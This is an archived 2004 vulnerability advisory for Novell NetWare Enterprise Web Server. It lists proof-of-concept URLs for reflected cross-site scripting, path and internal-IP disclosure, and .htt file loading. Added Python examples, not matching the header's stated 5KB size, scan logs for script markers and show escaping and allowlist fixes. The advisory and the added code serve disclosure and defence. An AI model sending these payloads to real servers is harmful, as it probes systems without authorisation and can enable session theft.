Text File  |  2005-02-12  |  5KB  |  136 lines

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software:        Novell Netware
Vendor:          http://www.Novell.com
Versions:        NetWare-Enterprise-Web-Server/5.1/6.0
Platforms:       Windows
Bug:             Multiple Vulnerabilities
Risk:            Medium
Exploitation:    Remote with browser
Date:            6 Jan 2004
Author:          Rafel Ivgi, The-Insider
e-mail:          the_insider@mail.com
web:             http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Novell NetWare-Enterprise-Web-Server is a strong and steady web server.
It is used by big companies and some governments.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Cross Site Scripting and Local Path Disclosure Vulnerability:
-----------------------------------------------------------------------------------
The vulnerability is of the Cross Site Scripting type. Requesting one of the
following URLs from the server triggers it:

http://<host>/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
     -   Cross Site Scripting Vulnerability
http://<host>/perl/<script>alert('XSS')</script>.pl
     -   Cross Site Scripting Vulnerability
http://<host>/perl/\/.pl
     -   cgi2perl running on the server contains Local Path Disclosure
http://<host>/servlet/webacc?User.id="><script>alert('XSS')</script>
     -   Cross Site Scripting Vulnerability - Unfiltered Parameters
http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqdOq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.version="><script>alert('XSS')</script>
     -   Cross Site Scripting Vulnerability - Unfiltered Parameters
http://<host>/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas
     -   Cross Site Scripting Vulnerability

If all of these circumstances are met, an attacker may be able to exploit this
issue via a malicious link containing arbitrary HTML and script code as part of
the hostname. When the malicious link is clicked by an unsuspecting user, the
attacker-supplied HTML and script code will be executed by their web client.
This occurs because the server echoes back the malicious hostname supplied in
the client's request without sufficiently escaping HTML and script code.

Attacks of this nature may make it possible for attackers to manipulate web
content or to steal cookie-based authentication credentials. It may be possible
to take arbitrary actions as the victim user.
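The reflection described above, as an added defender-side example (not the author's code and not Novell's): a small Python scanner that percent-decodes and case-folds the request target of each access-log line, so the mixed-case and percent-encoded variants in the probe list are all caught, beside the raw-echo error page that causes the problem and its HTML-escaped replacement. The log lines are constructed here to mirror the probes above, and the marker list and the backslash heuristic for the cgi2perl probe are assumptions of this example, not part of the advisory.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format). They mirror the
# probe patterns listed in the advisory but are not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jan/2004:10:00:01 +0000] "GET /perl/index.pl HTTP/1.0" 200 512
10.0.0.7 - - [06/Jan/2004:10:00:02 +0000] "GET /perl/\\<sCRIPT>alert(%22d%22)</sCRIPT>\\.pl HTTP/1.0" 404 311
10.0.0.7 - - [06/Jan/2004:10:00:03 +0000] "GET /servlet/webacc?User.id=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.0" 200 2048
10.0.0.7 - - [06/Jan/2004:10:00:04 +0000] "GET /nsn/%22%3Cscript%20language=vbscript%3Emsgbox%20sadas%3C/script%3E%22.bas HTTP/1.0" 404 290
10.0.0.9 - - [06/Jan/2004:10:00:05 +0000] "GET /perl/%5C/.pl HTTP/1.0" 500 640
"""

REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markup fragments that have no business in a request path or query string of
# this application; matched after decoding and case-folding (assumed list).
SCRIPT_MARKERS = ("<script", "</script", "javascript:", "onerror=", "onload=")


def normalize(target):
    """Percent-decode up to three times (catches double encoding), then lower-case."""
    prev = None
    cur = target
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.lower()


def classify(target):
    """Return a label for a suspicious request target, or None if it looks benign."""
    norm = normalize(target)
    if any(marker in norm for marker in SCRIPT_MARKERS):
        return "xss-probe"
    # Heuristic (an assumption of this example): a backslash inside a /perl/ path
    # matches the cgi2perl path-disclosure request the advisory lists.
    path = norm.split("?", 1)[0]
    if path.startswith("/perl/") and "\\" in path:
        return "cgi2perl-path-disclosure-probe"
    return None


def scan_log(text):
    """Return (client, label, raw target) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        label = classify(m.group("target"))
        if label:
            hits.append((m.group("client"), label, m.group("target")))
    return hits


def render_error_unsafe(requested_path):
    """The failure mode the advisory describes: the request path is echoed raw."""
    return "<html><body>File not found: " + requested_path + "</body></html>"


def render_error_safe(requested_path):
    """Hardened form: HTML-escape anything reflected from the request."""
    return ("<html><body>File not found: "
            + html.escape(requested_path, quote=True) + "</body></html>")


if __name__ == "__main__":
    for client, label, target in scan_log(SAMPLE_LOG):
        print(f"{client}\t{label}\t{target}")
    print(render_error_safe('/perl/<script>alert("XSS")</script>.pl'))
```

Decoding before matching is the part that matters: a rule that looks for the literal string `<script>` in the raw log misses `<sCRIPT>`, `%3Cscript%3E` and the double-encoded form, which is why `normalize` runs the decoder more than once and compares in lower case. The escaping fix is the same whatever the server language: every fragment of the request that lands in an HTML response goes through an HTML encoder first.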

Internal IP Disclosure (and much more server information):
-----------------------------
http://<host>/examples/jsp/snp/snoop.jsp
http://<host>/servlet/SnoopServlet
http://<host>/nsn/env.bas
http://<host>/lcgi/lcgitest.nlm

Load .htt files:
-------------------
http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqdOq&User.interface=frames&error=c:\windows\web\folder

Directory Listing:
-----------------------
/com/
/com/novell/
/com/novell/webaccess
/ns-icons/

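For the snoop-page and .htt findings above, an added Python example that is not part of the advisory and not Novell's code. The `error=` value is used to pick a template file, so the hardened selector accepts only a bare name from an allowlist and falls back to a default for anything else; the allowlist, the default template name and the diagnostic response body are constructed assumptions of this example. A second check reports RFC 1918 or loopback addresses found in a response body, which is how a scanner can flag diagnostic pages like snoop.jsp that print the server's own address.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist for a hypothetical deployment; the advisory does not list
# the real set of WebAccess template names.
ALLOWED_TEMPLATES = frozenset({"login", "logout", "timeout"})
DEFAULT_TEMPLATE = "login"

# A bare template name: no drive letters, separators, dots or traversal sequences.
TEMPLATE_NAME_RE = re.compile(r"^[a-z][a-z0-9_]{0,31}$")


def select_template_unsafe(error_value):
    """Failure mode the advisory describes: the parameter becomes a file path."""
    return error_value + ".htt"


def select_template_safe(error_value):
    """Accept only an allowlisted bare name; everything else gets the default."""
    if TEMPLATE_NAME_RE.match(error_value) and error_value in ALLOWED_TEMPLATES:
        return error_value + ".htt"
    return DEFAULT_TEMPLATE + ".htt"


def template_for_url(url):
    """Resolve the template a webacc URL would load under the hardened selector."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    error_value = qs.get("error", [""])[0]
    return select_template_safe(error_value)


# Address ranges treated as internal (RFC 1918 plus loopback).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def internal_addresses_in(body):
    """Return internal IPv4 addresses printed in a response body, in order, without duplicates."""
    found = []
    for candidate in IPV4_RE.findall(body):
        try:
            addr = ipaddress.IPv4Address(candidate)
        except ValueError:
            continue  # e.g. 999.1.1.1 is not an address
        if any(addr in net for net in INTERNAL_NETS) and str(addr) not in found:
            found.append(str(addr))
    return found


# Constructed response body resembling what a request-dumping diagnostic page
# such as snoop.jsp prints; not an actual server response.
SAMPLE_SNOOP_BODY = """\
<html><body><h1>Request Information</h1>
Server Name: intranet.example.test
Server Port: 80
Local Address: 192.168.10.25
Remote Address: 203.0.113.9
Path Translated: /web/docs/examples/jsp/snp/snoop.jsp
</body></html>
"""

if __name__ == "__main__":
    print(select_template_safe(r"c:\windows\web\folder"))   # falls back to login.htt
    print(internal_addresses_in(SAMPLE_SNOOP_BODY))        # the local address leaks
```

The allowlist is deliberately checked after the character-class test: the regex rejects anything that could name a file elsewhere on disk, and the set membership makes sure a name that passes the regex still maps to a template the application meant to expose. For the disclosure check, the ranges are spelled out rather than taken from `IPv4Address.is_private`, because that property also covers documentation and benchmark ranges that are not internal addresses.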
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

http://<host>/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
     -   Cross Site Scripting Vulnerability
http://<host>/perl/<script>alert('XSS')</script>.pl
     -   Cross Site Scripting Vulnerability
http://<host>/perl/\/.pl
     -   cgi2perl running on the server contains Local Path Disclosure
http://<host>/servlet/webacc?User.id="><script>alert('XSS')</script>
     -   Cross Site Scripting Vulnerability - Unfiltered Parameters
http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqdOq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.version="><script>alert('XSS')</script>
     -   Cross Site Scripting Vulnerability - Unfiltered Parameters
http://<host>/examples/jsp/snp/snoop.jsp
     -   Internal IP Disclosure
http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqdOq&User.interface=frames&error=<htt file>
     -   Load .htt files
http://<host>/servlet/SnoopServlet
     -   Internal IP Disclosure
http://<host>/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas
     -   Cross Site Scripting Vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A lot of thanks to
Stuart Moore:
**************************
SecurityTracker.com
SecurityGlobal.net LLC
smoore@securityglobal.net
+1 301 495 5930 voice
+1 413 691 4346 fax
****************************
Without his help this wouldn't have been published.

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."